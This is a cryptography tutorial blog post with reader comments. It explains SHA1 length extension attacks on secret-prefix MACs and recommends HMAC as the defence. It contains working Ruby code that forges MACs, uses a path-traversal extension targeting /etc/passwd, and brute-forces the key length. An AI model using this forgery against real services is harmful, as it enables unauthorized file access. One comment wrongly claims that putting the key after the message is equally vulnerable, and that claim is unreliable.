Web Application Security

Hash Length Extension Attacks

It seems that many penetration testers rarely test for cryptographic vulnerabilities. I’ve always been interested in cryptography, so I’ve made it a goal to understand how web application developers misuse crypto, and how to exploit the flaws that this misuse creates.

In January, I did some independent research on how to perform hash length extension attacks against poorly implemented message authentication codes (MACs). I found several good research papers and blog posts that discussed how these attacks work in a very general sense. However, there was not much information that explained the details of a length extension attack step by step. In this post, I’ll explain exactly what happens.

Message Authentication Codes 101

Message authentication codes (MACs) are a way to verify the authenticity of a message. In the most naive implementation of a MAC, the server has a secret key that it concatenates with a message, and then hashes the combination with an algorithm such as MD5 or SHA1. For example, consider an application that is designed to give an authorized user the ability to download specific files. The site might create a MAC for the filename like this:

require 'digest/sha1'

def create_mac(key, fileName)
  return Digest::SHA1.hexdigest(key + fileName)
end


The resulting URL might look something like:


When the user sends the request to download a file, the following function is executed:

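def verify_mac(key, fileName, userMac)
  validMac = create_mac(key, fileName)
  if validMac == userMac
    initiateDownload()   # serve the requested file
  else
    raise "Invalid MAC"  # the filename or the MAC was tampered with
  end
end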

With this code, the server should only call initiateDownload if the user has not tampered with the filename… or so the theory goes. In reality, this method of creating a MAC leaves the site vulnerable to an attack where attackers can append their own content to the end of the file parameter.

Length Extension Attacks, The Simple Explanation

Many cryptographic hash functions, such as MD5, SHA1, and SHA2, are based on a construction known as Merkle–Damgård. This type of hash function has an interesting property: if you have a message that is concatenated with a secret, and the resulting hash of the concatenated value (the MAC), and you know only the length of that secret, you can add your own data to the message and calculate a value that will pass the MAC check without knowing the secret itself.

Example: message + padding + extension

Continuing the example from above, an extension attack against the hypothetical file download MAC would look like this:




Length Extensions In Depth

To understand why this attack works, you first must understand what happens inside a hash function.

How Hash Algorithms Work

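Hash functions work on blocks of data. As an example, 512 bits is the block length for MD5, SHA1 and SHA256. Most messages that are hashed will have a length that is not evenly divisible by the block length, so the message is padded to a multiple of the block length (padding is always added, even when the length already happens to be a multiple). For SHA1, the padding is a single 0x80 byte, followed by as many zero bytes as needed, followed by the length of the original message in bits, written as a 64-bit big-endian integer. Using the file download MAC example above, the message after padding would look like this (the ‘x’s represent the secret key):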



In SHA1, which is the algorithm being used in this example, a hash consists of five 32-bit integers. When displayed, these integers are usually written in hexadecimal and concatenated together. When the algorithm starts, these integers (the registers) are set to the following initial values: 67452301, EFCDAB89, 98BADCFE, 10325476, C3D2E1F0. Then, once the message has been padded, it is broken up into 512-bit blocks. The algorithm runs through these blocks in order, performing a series of calculations with each block to update the registers. Once the last block has been processed, the contents of the registers are the resulting hash of the message. In other words, the published hash is the complete internal state of the algorithm after the last block, which is what makes the attack below possible.
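The padding and block-splitting steps described above can be sketched in Ruby, the language of the article’s own examples. This is a minimal sketch rather than a library API: sha1_padding and blocks are hypothetical helper names, and the 11 ‘x’s stand in for the secret key used later in this post.

```ruby
# SHA1 padding: a 0x80 byte, enough zero bytes, then the original length in
# bits as a 64-bit big-endian integer, so the total is a multiple of 64 bytes.
def sha1_padding(message_length)
  zeros = (55 - message_length) % 64 # 55 = 64 - 1 (0x80 byte) - 8 (length field)
  "\x80".b + ("\x00" * zeros).b + [message_length * 8].pack("Q>")
end

# Break a padded message into 512-bit (64-byte) blocks.
def blocks(padded)
  (0...padded.bytesize).step(64).map { |i| padded.byteslice(i, 64) }
end

message = ("x" * 11 + "report.pdf").b # 11 'x's stand in for the secret key
padded = message + sha1_padding(message.bytesize)

puts padded.bytesize            # => 64 (exactly one block)
puts blocks(padded).length      # => 1
puts padded.bytes.last.to_s(16) # => a8 (21 bytes * 8 = 168 bits)
```

For this message (11 key bytes plus ‘report.pdf’, 21 bytes in total), the padding fills the rest of a single 64-byte block and ends with 0xA8, which is 168, the message length in bits.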

Calculating An Extension

The first step in calculating an extension is to create a new MAC. To do this, the data we are extending the message with (‘/../../../../../../../etc/passwd’ in our example) must be hashed. However, when performing this hash, the initial registers must be overridden with the MAC from the original message. You can think of this as making the SHA1 function start off at the state where the server’s hash function left off.

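Attacker's MAC = SHA1(extension + padding) <- but with the registers overridden by the original MAC, and with the padding encoding the length of key + message + padding + extension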

For this attack to work, the extension must start at the beginning of a new block when it goes into the server’s hash function. The second step, therefore, is to calculate enough padding so that key + message + padding is a multiple of 512 bits. In this example, the key is 11 characters long. Therefore, the padded message would look like this:



The padded and extended message is then sent to the server, with the new MAC:




Here is what the server hashes when it processes the attacker’s forged message: secret + message + padding to the end of the first block + extension + padding to the end of the last block. The result of the server’s hash will be ee40aa8ec0cfafb7e2ec4de20943b673968857a5, which is the same result as hashing the extension while overriding the registers with the original MAC. This occurs because the attacker’s hashing operation starts at exactly the state the server’s hash operation reaches after it has processed the first block (secret + message + padding), and both then process the same remaining bytes.
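Below is a self-contained Ruby sketch of both steps, assuming the key length (11) is known. It implements the SHA1 compression function by hand, because Ruby’s Digest::SHA1 offers no way to set the initial registers. The secret key "s3cr3t-k3y!" and the helper names compress and forge are hypothetical. Because the article’s real key is not known, the printed MAC will not be ee40aa8ec0cfafb7e2ec4de20943b673968857a5; the last line instead lets the simulated server check the forgery with its own key.

```ruby
require "digest"

MASK = 0xFFFFFFFF

def rotl(x, n)
  ((x << n) | (x >> (32 - n))) & MASK
end

# SHA1 padding for `length` bytes: 0x80, zero bytes, then the bit length (64-bit big-endian).
def sha1_padding(length)
  "\x80".b + ("\x00" * ((55 - length) % 64)).b + [length * 8].pack("Q>")
end

# Fold one 64-byte block into the five SHA1 registers.
def compress(state, block)
  w = block.unpack("N16")
  (16...80).each { |i| w[i] = rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1) }
  a, b, c, d, e = state
  80.times do |i|
    f, k = case i
           when 0..19  then [(b & c) | (~b & d), 0x5A827999]
           when 20..39 then [b ^ c ^ d, 0x6ED9EBA1]
           when 40..59 then [(b & c) | (b & d) | (c & d), 0x8F1BBCDC]
           else             [b ^ c ^ d, 0xCA62C1D6]
           end
    a, b, c, d, e = (rotl(a, 5) + f + e + k + w[i]) & MASK, a, rotl(b, 30), c, d
  end
  state.zip([a, b, c, d, e]).map { |x, y| (x + y) & MASK }
end

# Forge message + glue padding + extension and its MAC, knowing only the
# original MAC and the key length (never the key itself).
def forge(known_mac, key_length, message, extension)
  # Second step in the article: glue padding so the extension starts a new block.
  glue = sha1_padding(key_length + message.bytesize)
  forged_message = message.b + glue + extension.b
  # First step: load the registers from the known MAC instead of the SHA1 constants...
  state = [known_mac].pack("H*").unpack("N5")
  # ...then hash the extension, padded with the length of the WHOLE forged input.
  tail = extension.b + sha1_padding(key_length + forged_message.bytesize)
  (0...tail.bytesize).step(64) { |i| state = compress(state, tail.byteslice(i, 64)) }
  [forged_message, state.map { |h| format("%08x", h) }.join]
end

# Simulated server with a hypothetical 11-character secret the attacker never sees.
SECRET = "s3cr3t-k3y!"
known_mac = Digest::SHA1.hexdigest(SECRET + "report.pdf") # the MAC from a legitimate URL

forged_name, forged_mac = forge(known_mac, 11, "report.pdf", "/../../../../../../../etc/passwd")
puts forged_mac
puts Digest::SHA1.hexdigest(SECRET + forged_name) == forged_mac # the server's own check
```

The forged filename contains the raw glue bytes (0x80, the zeros, and the length field), so in a real request it would have to be URL-encoded before being placed in the file parameter.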

How To Run The Attack

For simplicity, in this example I revealed that the key length was 11 characters. In a real-world attack, where the attacker will not know the length of the key, he will need to determine the key length.

Continuing the example, let’s say that the vulnerable website returns different errors (HTTP response codes, error messages in a response body, etc.) when MAC validation fails than when validation succeeds but the file is not found. An attacker can then calculate multiple extensions, one for each possible key length, and send each one to the server. When the server responds with the “file not found” error instead of the MAC error, the attacker has confirmed that a length extension vulnerability exists and has learned the key length, and is free to calculate new extensions aimed at gaining unauthorized access to sensitive files on the server.
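The key-length search can be sketched against a simulated server that, as described above, answers differently for a MAC failure and for a missing file. Everything here is a hypothetical stand-in: the secret, the server_response method and its :bad_mac/:not_found results, and the upper bound of 64 key bytes tried. The block carries its own hand-written SHA1 compression function, since Ruby’s Digest::SHA1 cannot start from arbitrary registers.

```ruby
require "digest"

MASK = 0xFFFFFFFF

def rotl(x, n)
  ((x << n) | (x >> (32 - n))) & MASK
end

# SHA1 padding for `length` bytes: 0x80, zero bytes, then the bit length (64-bit big-endian).
def sha1_padding(length)
  "\x80".b + ("\x00" * ((55 - length) % 64)).b + [length * 8].pack("Q>")
end

# Fold one 64-byte block into the five SHA1 registers.
def compress(state, block)
  w = block.unpack("N16")
  (16...80).each { |i| w[i] = rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1) }
  a, b, c, d, e = state
  80.times do |i|
    f, k = case i
           when 0..19  then [(b & c) | (~b & d), 0x5A827999]
           when 20..39 then [b ^ c ^ d, 0x6ED9EBA1]
           when 40..59 then [(b & c) | (b & d) | (c & d), 0x8F1BBCDC]
           else             [b ^ c ^ d, 0xCA62C1D6]
           end
    a, b, c, d, e = (rotl(a, 5) + f + e + k + w[i]) & MASK, a, rotl(b, 30), c, d
  end
  state.zip([a, b, c, d, e]).map { |x, y| (x + y) & MASK }
end

# Forged filename and MAC for one guessed key length.
def forge(known_mac, key_length, message, extension)
  forged = message.b + sha1_padding(key_length + message.bytesize) + extension.b
  state = [known_mac].pack("H*").unpack("N5")
  tail = extension.b + sha1_padding(key_length + forged.bytesize)
  (0...tail.bytesize).step(64) { |i| state = compress(state, tail.byteslice(i, 64)) }
  [forged, state.map { |h| format("%08x", h) }.join]
end

# Hypothetical vulnerable server: distinct answers for a bad MAC and a missing file.
SECRET = "s3cr3t-k3y!" # unknown to the attacker, including its length

def server_response(file_name, mac)
  return :bad_mac unless Digest::SHA1.hexdigest(SECRET + file_name) == mac
  :not_found # MAC accepted; this simulation has no files to serve
end

known_mac = Digest::SHA1.hexdigest(SECRET + "report.pdf") # taken from a legitimate URL
extension = "/../../../../../../../etc/passwd"

# Try each candidate key length until the server stops reporting a bad MAC.
key_length = (1..64).find do |guess|
  server_response(*forge(known_mac, guess, "report.pdf", extension)) == :not_found
end
puts "key length: #{key_length.inspect}"
```

Only the correct guess makes the forged glue padding match what the server actually hashed, so the first :not_found answer reveals the key length; every wrong guess yields a MAC the server rejects.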

How To Defend Against This Attack

The solution to this vulnerability is to use an algorithm known as HMAC. Instead of just hashing the key concatenated with the message, HMAC does something like this:

MAC = hash(key + hash(key + message))

How HMAC actually works is a bit more complicated, but you get the general idea. The important part is that the MAC an attacker can see is the output of the outer hash, which covers the key a second time. Extending that output does not give the attacker the hash of key + message + padding + extension that the server would compute, so the extension attack described in this post does not work. HMAC was first published in 1996, and has since been implemented in just about every programming language’s standard library.
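For reference, the full construction (RFC 2104) pads the key to one block and XORs it with two fixed bytes: 0x36 (ipad) for the inner hash and 0x5C (opad) for the outer hash. The Ruby sketch below writes HMAC-SHA1 out by hand only to show that structure, and checks it against OpenSSL::HMAC from Ruby’s standard library; the helper name hmac_sha1_hex and the key are made-up placeholders. In real code, call OpenSSL::HMAC directly.

```ruby
require "digest"
require "openssl"

SHA1_BLOCK_SIZE = 64 # bytes

# HMAC-SHA1 written out by hand to show its structure (illustration only).
def hmac_sha1_hex(key, message)
  key = Digest::SHA1.digest(key) if key.bytesize > SHA1_BLOCK_SIZE # long keys are hashed first
  key = key.b.ljust(SHA1_BLOCK_SIZE, "\x00".b)                     # then zero-padded to one block
  inner_key = key.bytes.map { |byte| byte ^ 0x36 }.pack("C*")      # K xor ipad
  outer_key = key.bytes.map { |byte| byte ^ 0x5c }.pack("C*")      # K xor opad
  inner = Digest::SHA1.digest(inner_key + message.b)
  Digest::SHA1.hexdigest(outer_key + inner)                        # the key is hashed in again here
end

key = "hypothetical-secret-key"
file_name = "report.pdf"
puts hmac_sha1_hex(key, file_name)
puts hmac_sha1_hex(key, file_name) == OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"), key, file_name)
```

Applied to the file download example, a safer create_mac could return OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA256"), key, fileName); choosing SHA256 over SHA1 there is a suggestion, not something the original code did.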


Though there are still some crazy people who write their own cryptographic algorithms, most people have gradually figured out that writing their own crypto is a bad idea. However, it is essential to do more than merely use publicly vetted crypto algorithms: you must use those algorithms in the right way. Unless you thoroughly understand how the algorithms you use work, and know how to use them correctly, it is always safer to rely on professionally vetted, high-level libraries that will take care of the low-level stuff for you.

  • Lorenzo

    Hi Douglas

    thanks for your post…very interesting!

    I’m trying to implement your attack in python but I am unable to forge the right Attacker MAC value… I used the pypy python implementation for sha, and added a function to set the registers, but the forged mac value (ee40…) is always different from the one in the post.

    Maybe there is something I miss :)

    1) Have I understood exactly what message the attacker has to hash in order to obtain a valid MAC?

    padding = ‘\x80\x00\x00…’

    extension = ‘…../etc/passwd’ #various dot dot slash omitted

    AttackerMAC = sha1(extension+padding) ?

    2) These are the values that overrides the registers… am I right?


    # h0 = 563162c9 , h1 = c71a1736, h2 = 7d44c165, h3 = b84b85ab, h4 = 59d036f9

    h0 = 0x563162C9L

    h1 = 0xC71A1736L

    h2 = 0x7D44C165L

    h3 = 0xB84B85ABL

    h4 = 0x59D036F9L


    • Matthew Nelson

      Lorenzo, remember that, in addition to the initialization vector, you must also adjust the length appended by your modified SHA1.

    • Otto Dandenell

      Hi Lorenzo.

      My interpretation is this:

      The attack is based on the assumption that the attacker ALREADY KNOWS the VALID MAC to the file “report.pdf”. But he doesn’t know (and doesn’t need to know) the secret key.

      In order to create the attackerMAC, you need to “replay” the verify_mac() that would take place on the server. The server would do (as per the pseudo-code above):

      validMac = create_mac(key, filename)

      This would be implemented as:



      Because the forged message is crafted so that the first block ends exactly at 512 bits, we know that on the server, sha1() will be executed like this (in pseudo code):

      1) sha1(‘xxxxxxxxxxxreport.pdfx80x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00

      x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xA8’) –> Registers will be set to our known valid mac

      2) sha1(‘/../../../../../../../etc/passwd’)

      So, the trick is to first set the registers to your known valid mac, then run the sha1() hash function using only the payload as argument.

      I don’t know if the sha1 routine of your crypto library supports setting the registers arbitrarily. If not, find a description of how sha1 is implemented and roll your own.

    • Otto Dandenell

      To clarify my previous comment: the attacker does need to know the length of the secret key (in order to determine the length of the padding). To find the length, the attacker can try everything between 0 and 511 bytes and see if there is any error response that differs (as suggested in the article), or even get the payload file back.

  • sandor


    Good article. Quick question: what would happen if you changed the MAC method just a little bit, so that the key is appended to the fileName, like so:

    hexdigest(fileName + key)

    Then the attack would not work anymore, right?

    grz Sandro

    • John


      Your modification would have the exact same vulnerability. The gist of the problem is that you have a message ‘xxxxx’ whose length is known to you, and the resulting hash of that message, which allows you to compute a new starting state from which to resume hashing with new content. It doesn’t matter if ‘xxxxx’ is ‘secret+something_known’ or ‘something_known+secret’ or even ‘something_totally_secret’. You just need to know how long the message being hashed is.

    • Mik

      Correct, Sandro – This won’t work if the last value isn’t under attacker control.

    • http://bit.ly/5bip23 Keeskip

      In that case (someone correct me if I’m wrong), if the hash function you’re using is MD5, you’ll be vulnerable to a different kind of attack: the collision attacks on MD5, which are what make a lot of people say MD5 is not secure anymore. SHA2 doesn’t (yet!) have this vulnerability, though, but I’m not sure you’d be completely in the clear.

      Also HMAC covers a few other likely failure scenarios, so it’s best to just stick with that tried and true algorithm. The advantage is that if somehow a vulnerability would be found in HMAC, you’d probably hear about it real quick, since that’d be a big problem for many systems globally.

      Finally, even though MD5 is considered “broken” by a lot of people, HMAC+MD5 is not. At least, I’m not aware of anything. So HMAC is really pretty good. I suggest you check the Wikipedia page on HMAC; it’s quite easy to understand. The author of this article gave about 3/4 of the algorithm (for brevity, I understand); the full HMAC algorithm adds some special padding bytes to the formula to strengthen it even more against some theoretical attacks. So basically, if your standard library implements MD5 but not HMAC, it’s about 10 lines of code to build HMAC+MD5, which is secure.

      Do make sure your secret key is a long string of random characters, not a password or something. You wouldn’t want to go through all this trouble and get brute-forced :)

  • jay

    Is what sandor is asking correct? Can you simply reverse the order of the message and shared secret to be secure?

    hexdigest(fileName + key) rather than hexdigest(key + fileName)

  • Alexey

    Hash_extender is a tool for hash length extension attacks. I think it should be mentioned here.


    • Carlos

      Can anyone help me adapt hash_extender to a particular case I have? I’m having trouble making it work and it seems so easy…it’s making me crazy. Thanks in advance!


